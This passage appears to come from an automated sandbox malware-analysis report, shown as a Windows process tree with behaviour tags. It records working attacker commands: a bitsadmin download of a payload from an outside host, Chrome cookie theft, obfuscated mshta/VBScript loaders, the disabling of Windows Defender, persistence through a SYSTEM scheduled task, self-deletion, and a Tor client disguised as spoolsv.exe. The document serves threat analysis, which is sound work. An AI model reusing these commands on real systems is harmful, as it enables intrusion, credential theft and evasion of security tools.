                                                              • C:\Users\Admin\Documents\Rerc7TyS1ORcmF8ZrWbDp5zM.exe
                                                                C:\Users\Admin\Documents\Rerc7TyS1ORcmF8ZrWbDp5zM.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:728
                                                            • C:\Users\Admin\Documents\RQjbpKXdoUleLwTQP57uZ908.exe
                                                              "C:\Users\Admin\Documents\RQjbpKXdoUleLwTQP57uZ908.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:1428
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5840
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:6016
                                                            • C:\Users\Admin\Documents\750JU4PyJDeOiOiogMYa9tuI.exe
                                                              "C:\Users\Admin\Documents\750JU4PyJDeOiOiogMYa9tuI.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4192
                                                              • C:\Users\Admin\Documents\750JU4PyJDeOiOiogMYa9tuI.exe
                                                                "C:\Users\Admin\Documents\750JU4PyJDeOiOiogMYa9tuI.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3996
                                                              • C:\Users\Admin\Documents\750JU4PyJDeOiOiogMYa9tuI.exe
                                                                "C:\Users\Admin\Documents\750JU4PyJDeOiOiogMYa9tuI.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4180
                                                            • C:\Users\Admin\Documents\_961pw0lFnIb0kCHgRCBYD3F.exe
                                                              "C:\Users\Admin\Documents\_961pw0lFnIb0kCHgRCBYD3F.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              PID:4348
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3696
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5984
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5588
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4824
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5412
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:632
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                            7⤵
                                                                            • Checks for any installed AV software in registry
                                                                            PID:2764
                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                            "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                            7⤵
                                                                            • Download via BitsAdmin
                                                                            PID:6064
                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pERbtKanWk9gwptl -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:4128
                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pCThQ32i97itjuHt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:5156
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:6044
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:3712
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:6084
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:5764
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:5672
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\plsapCrDZ\plsapCrDZ.dll" plsapCrDZ
                                                                                      7⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:5408
                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\plsapCrDZ\plsapCrDZ.dll" plsapCrDZ
                                                                                        8⤵
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in System32 directory
                                                                                        PID:5404
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:2468
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:3244
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:2204
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:1316
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr2151.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:5944
                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5608
                                                                                            • C:\Users\Admin\Documents\E2HxJ0Ew7l_iZG0Tcx6Y3QF9.exe
                                                                                              "C:\Users\Admin\Documents\E2HxJ0Ew7l_iZG0Tcx6Y3QF9.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks processor information in registry
                                                                                              PID:4724
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im E2HxJ0Ew7l_iZG0Tcx6Y3QF9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\E2HxJ0Ew7l_iZG0Tcx6Y3QF9.exe" & del C:\ProgramData\*.dll & exit
                                                                                                7⤵
                                                                                                  PID:6088
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im E2HxJ0Ew7l_iZG0Tcx6Y3QF9.exe /f
                                                                                                    8⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5396
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    8⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:5384
                                                                                              • C:\Users\Admin\Documents\z8ga5y11Gc_HSKl9rWgcg3tq.exe
                                                                                                "C:\Users\Admin\Documents\z8ga5y11Gc_HSKl9rWgcg3tq.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4692
                                                                                                • C:\Users\Admin\Documents\z8ga5y11Gc_HSKl9rWgcg3tq.exe
                                                                                                  C:\Users\Admin\Documents\z8ga5y11Gc_HSKl9rWgcg3tq.exe
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3264
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                            4⤵
                                                                                              PID:2188
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 432
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1888
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3548
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_6.exe
                                                                                                sonia_6.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3928
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4060
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                    PID:4760
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    6⤵
                                                                                                      PID:3184
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      6⤵
                                                                                                        PID:5572
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1416
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:4012
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:4532
                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:808
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2212
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              PID:5316
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                2⤵
                                                                                                  PID:5336
                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:4760
                                                                                              • C:\Users\Admin\AppData\Local\Temp\F2D3.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\F2D3.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5340
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                1⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                PID:4356
                                                                                              • C:\Users\Admin\AppData\Local\Temp\FF67.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\FF67.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:2112
                                                                                              • C:\Users\Admin\AppData\Local\Temp\540B.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\540B.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:5956
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                1⤵
                                                                                                  PID:3472
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                  1⤵
                                                                                                    PID:656
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                    1⤵
                                                                                                      PID:676
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F78B.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\F78B.exe
                                                                                                      1⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5652
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2B5D.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\2B5D.exe
                                                                                                      1⤵
                                                                                                        PID:6116
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\31B7.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\31B7.exe
                                                                                                        1⤵
                                                                                                          PID:5672
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5473.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\5473.exe
                                                                                                          1⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:732
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7F0E.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7F0E.exe
                                                                                                          1⤵
                                                                                                            PID:1028
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A777.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\A777.exe
                                                                                                            1⤵
                                                                                                              PID:3204
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C967.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\C967.exe
                                                                                                              1⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:4804
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\27E4.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\27E4.exe
                                                                                                              1⤵
                                                                                                                PID:3340
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VBscrIPt:cLOSE ( cReaTEoBjecT ("wsCrIpT.SHelL" ). RUN ( "CMD.Exe /Q/c COpy /y ""C:\Users\Admin\AppData\Local\Temp\27E4.exe"" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF """" == """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\27E4.exe"" ) do taskkill -F -IM ""%~nxw"" " , 0 , tRUe) )
                                                                                                                  2⤵
                                                                                                                    PID:2392
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /Q/c COpy /y "C:\Users\Admin\AppData\Local\Temp\27E4.exe" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF "" == "" for %w In ("C:\Users\Admin\AppData\Local\Temp\27E4.exe" ) do taskkill -F -IM "%~nxw"
                                                                                                                      3⤵
                                                                                                                        PID:3588
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe
                                                                                                                          ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO
                                                                                                                          4⤵
                                                                                                                            PID:3212
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VBscrIPt:cLOSE ( cReaTEoBjecT ("wsCrIpT.SHelL" ). RUN ( "CMD.Exe /Q/c COpy /y ""C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe"" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF ""-pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO "" == """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe"" ) do taskkill -F -IM ""%~nxw"" " , 0 , tRUe) )
                                                                                                                              5⤵
                                                                                                                                PID:5080
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q/c COpy /y "C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF "-pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO " == "" for %w In ("C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe" ) do taskkill -F -IM "%~nxw"
                                                                                                                                  6⤵
                                                                                                                                    PID:5580
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VBsCRipt: ClosE ( CreAtEObJeCT ( "wSCRIPt.SHELL" ). rUN ( "cMd /Q /C eCho Z%TImE%ApS5D> m0AI.EFs & echO | set /p = ""MZ"" > BJ20P.c & cOPY /B /y bJ20P.C + J62Nc.UQ + mN5KGOW.2 +m0Ai.EFS 5HV1w9.F9 & DeL J62Nc.UQ mN5KgOW.2 M0Ai.EFS bJ20P.C& staRT regsvr32.exe -u 5hV1W9.F9 /S" , 0, TruE) )
                                                                                                                                  5⤵
                                                                                                                                    PID:3824
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C eCho Z%TImE%ApS5D> m0AI.EFs & echO | set /p = "MZ" > BJ20P.c & cOPY /B /y bJ20P.C + J62Nc.UQ+ mN5KGOW.2 +m0Ai.EFS 5HV1w9.F9 &DeL J62Nc.UQ mN5KgOW.2 M0Ai.EFS bJ20P.C& staRT regsvr32.exe -u 5hV1W9.F9 /S
                                                                                                                                      6⤵
                                                                                                                                        PID:6024
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>BJ20P.c"
                                                                                                                                          7⤵
                                                                                                                                            PID:5268
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echO "
                                                                                                                                            7⤵
                                                                                                                                              PID:680
                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              regsvr32.exe -u 5hV1W9.F9 /S
                                                                                                                                              7⤵
                                                                                                                                                PID:3712
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill -F -IM "27E4.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3616
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\293D.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\293D.exe
                                                                                                                                    1⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:1808
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 293D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\293D.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                      2⤵
                                                                                                                                        PID:5888
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im 293D.exe /f
                                                                                                                                          3⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5524
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          3⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:5044
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\36DA.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\36DA.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5260
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4D9F.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4D9F.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5972
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F450.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F450.exe
                                                                                                                                          1⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          PID:580
                                                                                                                                          • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                            2⤵
                                                                                                                                              PID:3284
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                              2⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:5468
                                                                                                                                            • C:\Windows\System\svchost.exe
                                                                                                                                              "C:\Windows\System\svchost.exe" formal
                                                                                                                                              2⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              PID:2508
                                                                                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                3⤵
                                                                                                                                                  PID:4728
                                                                                                                                                • C:\Windows\System\spoolsv.exe
                                                                                                                                                  "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3264
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6FE5.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6FE5.exe
                                                                                                                                                1⤵
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:5804
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\B7A8.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\B7A8.exe
                                                                                                                                                1⤵
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:1736
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DFA3.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DFA3.exe
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:5908
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DFA3.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DFA3.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5164
                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4248
                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4172
                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4692
                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3096
                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:808
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1224
                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4416
                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1920
                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5880
                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2000
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5012

                                                                                                                                                                      Network

